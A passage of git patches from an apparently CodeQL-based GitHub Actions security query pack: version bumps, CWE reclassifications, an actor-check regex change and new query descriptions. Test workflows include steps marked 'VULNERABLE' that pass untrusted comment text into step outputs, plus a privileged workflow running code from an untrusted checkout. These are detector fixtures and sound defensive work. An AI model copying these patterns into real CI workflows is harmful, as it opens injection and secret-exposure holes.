"OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$( Date: Wed, 7 Aug 2024 13:21:03 +0200 Subject: [PATCH 461/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 75b7f0057f74..1edaf464fa53 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.33 +version: 0.1.34 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4198930865f5..044b80d18548 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.33 +version: 0.1.34 groups: [actions, queries] suites: codeql-suites extractor: javascript From e4559e19d8f765c44a0636a7dca0bcb3d612d4c1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 13:46:27 +0200 Subject: [PATCH 462/707] Move Output Clobbering to CWE-074 --- ql/src/Security/{CWE-077 => CWE-074}/OutputClobberingHigh.ql | 4 +--- .../{CWE-077 => CWE-074}/.github/workflows/output1.yml | 0 .../{CWE-077 => CWE-074}/.github/workflows/output2.yml | 0 .../{CWE-077 => CWE-074}/OutputClobberingHigh.expected | 0 .../query-tests/Security/CWE-074/OutputClobberingHigh.qlref | 1 + .../query-tests/Security/CWE-077/OutputClobberingHigh.qlref | 1 - 6 files changed, 2 insertions(+), 4 deletions(-) rename ql/src/Security/{CWE-077 => CWE-074}/OutputClobberingHigh.ql (93%) rename ql/test/query-tests/Security/{CWE-077 => CWE-074}/.github/workflows/output1.yml (100%) rename ql/test/query-tests/Security/{CWE-077 => CWE-074}/.github/workflows/output2.yml (100%) rename ql/test/query-tests/Security/{CWE-077 => CWE-074}/OutputClobberingHigh.expected (100%) create mode 100644 ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref diff --git a/ql/src/Security/CWE-077/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql similarity index 93% rename from ql/src/Security/CWE-077/OutputClobberingHigh.ql rename to ql/src/Security/CWE-074/OutputClobberingHigh.ql index 44199a35210e..c53489f96285 100644 --- a/ql/src/Security/CWE-077/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -9,9 +9,7 @@ * @tags actions * security * experimental - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 + * external/cwe/cwe-074 */ import actions diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml b/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml rename to ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/output2.yml b/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/output2.yml rename to ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected rename to ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref new file mode 100644 index 000000000000..1e8b050bb9dc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref @@ -0,0 +1 @@ +Security/CWE-074/OutputClobberingHigh.ql diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref deleted file mode 100644 index 5af047eec9e1..000000000000 --- a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/OutputClobberingHigh.ql From b251c661f838a3a62ba85e6ad9c9ef26a0984858 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 13:46:50 +0200 Subject: [PATCH 463/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1edaf464fa53..0d53b48ef113 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.34 +version: 0.1.35 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 044b80d18548..ade19bd63ee7 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.34 +version: 0.1.35 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1750ebac18b8a96fa0a23b62079e71744782f90d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 17:09:50 +0200 Subject: [PATCH 464/707] fix(controlcheck): Improve checks for actors --- .../codeql/actions/security/ControlChecks.qll | 16 ++++-- .../CWE-074/.github/workflows/output2.yml | 8 ++- .../CWE-074/OutputClobberingHigh.expected | 3 ++ .../CWE-829/.github/workflows/dependabot3.yml | 52 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 4 ++ 5 files changed, 77 insertions(+), 6 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 90a989c1a163..2d8e60dca376 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -122,17 +122,23 @@ class LabelIfCheck extends LabelCheck instanceof If { class ActorIfCheck extends ActorCheck instanceof If { ActorIfCheck() { - // eg: github.actor == 'dependabot[bot]' - // eg: github.triggering_actor == 'CI Agent' - // eg: github.event.pull_request.user.login == 'mybot' + // eg: github.event.pull_request.user.login == 'admin' exists( normalizeExpr(this.getCondition()) .regexpFind([ - "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", - "\\bgithub\\.event\\.comment\\.user\\.login\\b", "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.commits.*\\.author\\.name\\b" ], _, _) ) + or + // eg: github.actor == 'admin' + // eg: github.triggering_actor == 'admin' + exists( + normalizeExpr(this.getCondition()) + .regexpFind(["\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b",], _, _) + ) and + not normalizeExpr(this.getCondition()).matches("%[bot]%") } } diff --git a/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml index fa2375d73f8a..614de61b0cb7 100644 --- a/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml +++ b/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml @@ -49,8 +49,14 @@ jobs: # VULNERABLE cat pr-number echo "::set-output name=OUTPUT::SAFE" - - id: clob2 + - id: clob3 run: | # VULNERABLE echo "::set-output name=OUTPUT::SAFE" ls *.txt + - id: clob4 + run: | + # VULNERABLE + CURRENT_VERSION=$(cat gradle.properties | sed -n '/^version=/ { s/^version=//;p }') + echo "$CURRENT_VERSION" + echo "::set-output name=OUTPUT::SAFE" diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected index 72eb314cb32e..b6cb2a32e479 100644 --- a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected @@ -6,6 +6,7 @@ edges | .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | @@ -19,6 +20,7 @@ nodes | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | @@ -28,3 +30,4 @@ subpaths | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT + fi + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: Merge Dependabot pull request + if: steps.set-milestone.outputs.mergeEnabled + run: gh pr merge ${{ github.event.pull_request.number }} --auto --rebase + env: + GH_TOKEN: ${{ secrets.GH_ACTIONS_REPO_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 93e816fe1f90..d5ad134c9768 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -59,6 +59,9 @@ edges | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | +| .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:48:9:52:57 | Run Step | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | @@ -153,6 +156,7 @@ edges | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | From 8ebe76668cd59844966e20cb7626f763545c4ee8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 17:24:59 +0200 Subject: [PATCH 465/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0d53b48ef113..d9889fb08694 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.35 +version: 0.1.36 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ade19bd63ee7..9b4795a0d8a4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.35 +version: 0.1.36 groups: [actions, queries] suites: codeql-suites extractor: javascript From f4f18f38ccb4cf89865dce475526bf143a37e800 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:04:32 +0200 Subject: [PATCH 466/707] Move Argument injection queries to its own CWE --- .../{CWE-094 => CWE-088}/ArgumentInjectionCritical.ql | 4 +--- .../Security/{CWE-094 => CWE-088}/ArgumentInjectionMedium.ql | 4 +--- .../{CWE-094 => CWE-088}/.github/workflows/arg_injection.yml | 0 .../{CWE-094 => CWE-088}/ArgumentInjectionCritical.expected | 0 .../Security/CWE-088/ArgumentInjectionCritical.qlref | 1 + .../{CWE-094 => CWE-088}/ArgumentInjectionMedium.expected | 0 .../Security/CWE-088/ArgumentInjectionMedium.qlref | 1 + .../Security/CWE-094/ArgumentInjectionCritical.qlref | 1 - .../Security/CWE-094/ArgumentInjectionMedium.qlref | 1 - 9 files changed, 4 insertions(+), 8 deletions(-) rename ql/src/Security/{CWE-094 => CWE-088}/ArgumentInjectionCritical.ql (89%) rename ql/src/Security/{CWE-094 => CWE-088}/ArgumentInjectionMedium.ql (89%) rename ql/test/query-tests/Security/{CWE-094 => CWE-088}/.github/workflows/arg_injection.yml (100%) rename ql/test/query-tests/Security/{CWE-094 => CWE-088}/ArgumentInjectionCritical.expected (100%) create mode 100644 ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref rename ql/test/query-tests/Security/{CWE-094 => CWE-088}/ArgumentInjectionMedium.expected (100%) create mode 100644 ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref diff --git a/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql similarity index 89% rename from ql/src/Security/CWE-094/ArgumentInjectionCritical.ql rename to ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index e56f613fac4f..affa372f14eb 100644 --- a/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -8,9 +8,7 @@ * @id actions/argument-injection/critical * @tags actions * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 + * external/cwe/cwe-088 */ import actions diff --git a/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql similarity index 89% rename from ql/src/Security/CWE-094/ArgumentInjectionMedium.ql rename to ql/src/Security/CWE-088/ArgumentInjectionMedium.ql index 66c51ae36738..fa5b750fd892 100644 --- a/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql @@ -8,9 +8,7 @@ * @id actions/argument-injection/medium * @tags actions * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 + * external/cwe/cwe-088 */ import actions diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml rename to ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected rename to ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref new file mode 100644 index 000000000000..e36c9c6f3e82 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-088/ArgumentInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected rename to ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref new file mode 100644 index 000000000000..afc26233870a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-088/ArgumentInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref deleted file mode 100644 index 6b3e2fd9f629..000000000000 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/ArgumentInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref deleted file mode 100644 index b9c4ae95e43a..000000000000 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/ArgumentInjectionMedium.ql From 9977f25f0f4ac6d990aca4eb3423a94e48bfe244 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:05:17 +0200 Subject: [PATCH 467/707] Move some queries to experimental --- ql/src/Security/CWE-078/CommandInjectionCritical.ql | 1 + ql/src/Security/CWE-078/CommandInjectionMedium.ql | 1 + ql/src/Security/CWE-200/SecretExfiltration.ql | 1 + ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql | 3 +-- ql/src/Security/CWE-918/RequestForgery.ql | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index 689424782842..f5a4aed3eca0 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -9,6 +9,7 @@ * @id actions/command-injection/critical * @tags actions * security + * experimental * external/cwe/cwe-078 */ diff --git a/ql/src/Security/CWE-078/CommandInjectionMedium.ql b/ql/src/Security/CWE-078/CommandInjectionMedium.ql index 5feacedc40bf..8e7d72dded93 100644 --- a/ql/src/Security/CWE-078/CommandInjectionMedium.ql +++ b/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -9,6 +9,7 @@ * @id actions/command-injection/medium * @tags actions * security + * experimental * external/cwe/cwe-078 */ diff --git a/ql/src/Security/CWE-200/SecretExfiltration.ql b/ql/src/Security/CWE-200/SecretExfiltration.ql index a6d1c18b733a..2e583a989893 100644 --- a/ql/src/Security/CWE-200/SecretExfiltration.ql +++ b/ql/src/Security/CWE-200/SecretExfiltration.ql @@ -8,6 +8,7 @@ * @id actions/secret-exfiltration * @tags actions * security + * experimental * external/cwe/cwe-200 */ diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index b32fe4068772..9610302d1c2a 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -8,9 +8,8 @@ * @id actions/pr-on-self-hosted-runner * @tags actions * security - * external/cwe/cwe-284 - * testing * experimental + * external/cwe/cwe-284 */ import codeql.actions.security.SelfHostedQuery diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 3700201c3152..9721d666bd45 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -8,6 +8,7 @@ * @id actions/request-forgery * @tags actions * security + * experimental * external/cwe/cwe-918 */ From d8df3ff6b3ca33598e2968b015cd318587fa46b9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:05:41 +0200 Subject: [PATCH 468/707] Use ControlCheck.dominates in the ImproperAccessControl query --- ql/src/Security/CWE-285/ImproperAccessControl.ql | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 3fc94d1aa22d..2c7882604b27 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -20,11 +20,6 @@ where job.getATriggerEvent() = event and event.getName() = "pull_request_target" and event.getAnActivityType() = "synchronize" and - job.getAStep() = checkout and - ( - checkout.getIf() = check - or - checkout.getEnclosingJob().getIf() = check - ) -select checkout, "The checked-out code can be changed after the authorization check o step $@.", - check, check.toString() + check.dominates(checkout) +select checkout, "The checked-out code can be modified after the authorization check $@.", check, + check.toString() From 9411fac4d02de6af4214f4d1f983d99bce815d24 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:06:06 +0200 Subject: [PATCH 469/707] New Descriptions --- .../CWE-077/EnvPathInjectionCritical.md | 37 ++++ .../CWE-077/EnvPathInjectionMedium.md | 37 ++++ .../CWE-077/EnvVarInjectionCritical.md | 117 ++++++++++++ .../Security/CWE-077/EnvVarInjectionMedium.md | 117 ++++++++++++ .../CWE-088/ArgumentInjectionCritical.md | 41 +++++ .../CWE-088/ArgumentInjectionMedium.md | 41 +++++ .../Security/CWE-094/CodeInjectionCritical.md | 26 ++- .../Security/CWE-094/CodeInjectionMedium.md | 26 ++- .../CWE-1395/UseOfKnownVulnerableAction.md | 13 ++ .../CWE-275/MissingActionsPermissions.md | 17 +- .../Security/CWE-285/ImproperAccessControl.md | 57 ++++++ .../CWE-312/ExcessiveSecretsExposure.md | 52 ++++++ .../CWE-312/UnmaskedSecretExposure.md | 37 ++++ .../CWE-349/CachePoisoningViaCodeInjection.md | 83 +++++++++ .../CWE-349/CachePoisoningViaDirectCache.md | 101 +++++++++++ .../CachePoisoningViaPoisonableStep.md | 85 +++++++++ .../UntrustedCheckoutTOCTOUCritical.md | 168 ++++++++++++++++++ .../CWE-367/UntrustedCheckoutTOCTOUMedium.md | 168 ++++++++++++++++++ .../CWE-571/ExpressionIsAlwaysTrue.md | 63 +++++++ .../CWE-829/ArtifactPoisoningCritical.md | 72 ++++++++ .../CWE-829/ArtifactPoisoningMedium.md | 72 ++++++++ ql/src/Security/CWE-829/UnpinnedActionsTag.md | 27 +++ .../CWE-829/UntrustedCheckoutCritical.md | 137 ++++++++++++++ .../Security/CWE-829/UntrustedCheckoutHigh.md | 137 ++++++++++++++ .../CWE-829/UntrustedCheckoutMedium.md | 137 ++++++++++++++ 25 files changed, 1860 insertions(+), 8 deletions(-) create mode 100644 ql/src/Security/CWE-077/EnvPathInjectionCritical.md create mode 100644 ql/src/Security/CWE-077/EnvPathInjectionMedium.md create mode 100644 ql/src/Security/CWE-077/EnvVarInjectionCritical.md create mode 100644 ql/src/Security/CWE-077/EnvVarInjectionMedium.md create mode 100644 ql/src/Security/CWE-088/ArgumentInjectionCritical.md create mode 100644 ql/src/Security/CWE-088/ArgumentInjectionMedium.md create mode 100644 ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md create mode 100644 ql/src/Security/CWE-285/ImproperAccessControl.md create mode 100644 ql/src/Security/CWE-312/ExcessiveSecretsExposure.md create mode 100644 ql/src/Security/CWE-312/UnmaskedSecretExposure.md create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoningCritical.md create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoningMedium.md create mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutCritical.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutHigh.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutMedium.md diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md new file mode 100644 index 000000000000..1891d41fa394 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -0,0 +1,37 @@ +# Environment Path Injection + +## Description + +GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to 